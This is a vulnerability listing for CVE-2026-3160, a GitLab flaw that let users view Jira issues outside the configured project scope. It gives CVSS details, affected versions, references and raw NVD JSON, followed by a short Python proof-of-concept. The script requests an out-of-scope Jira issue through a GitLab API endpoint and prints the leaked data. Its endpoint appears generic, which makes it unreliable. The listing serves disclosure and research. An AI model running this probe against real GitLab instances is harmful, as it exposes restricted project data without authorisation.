CVE-2026-3160

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to view Jira issues outside the configured project scope due to an integration filter functioning only as a display control rather than enforcing access boundaries as specified.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GitLab CE/EE >= 13.7, < 18.9.7

GitLab CE/EE >= 18.10, < 18.10.6

GitLab CE/EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target GitLab URL and Vulnerable Endpoint
# Replace with actual target URL for testing purposes only
target_url = "https://gitlab.example.com/api/v4/integrations/jira/issues"

# Valid authentication token (Private Access Token)
headers = {
    "Authorization": "Bearer <YOUR_VALID_TOKEN>"
}

# The ID of a Jira issue that is outside the configured project scope
# Attacker attempts to access restricted data
params = {
    "issue_id": "PROJ-1234"  # Target Jira Issue ID
}

try:
    response = requests.get(target_url, headers=headers, params=params)

    if response.status_code == 200:
        print("[+] Vulnerability Confirmed!")
        print("[+] Leaked Jira Issue Data:")
        print(response.json())
    else:
        print("[-] Request failed or access denied.")
        print(f"Status Code: {response.status_code}")

except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3160
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3160
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3160/
[4] VulDB https://vuldb.com/cve/CVE-2026-3160
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/591354
[7] https://hackerone.com/reports/3566042

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3160", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:22.657", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to view Jira issues outside the configured project scope due to an integration filter functioning only as a display control rather than enforcing access boundaries as specified."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-441"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/591354", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3566042", "source": "[email protected]"}]}}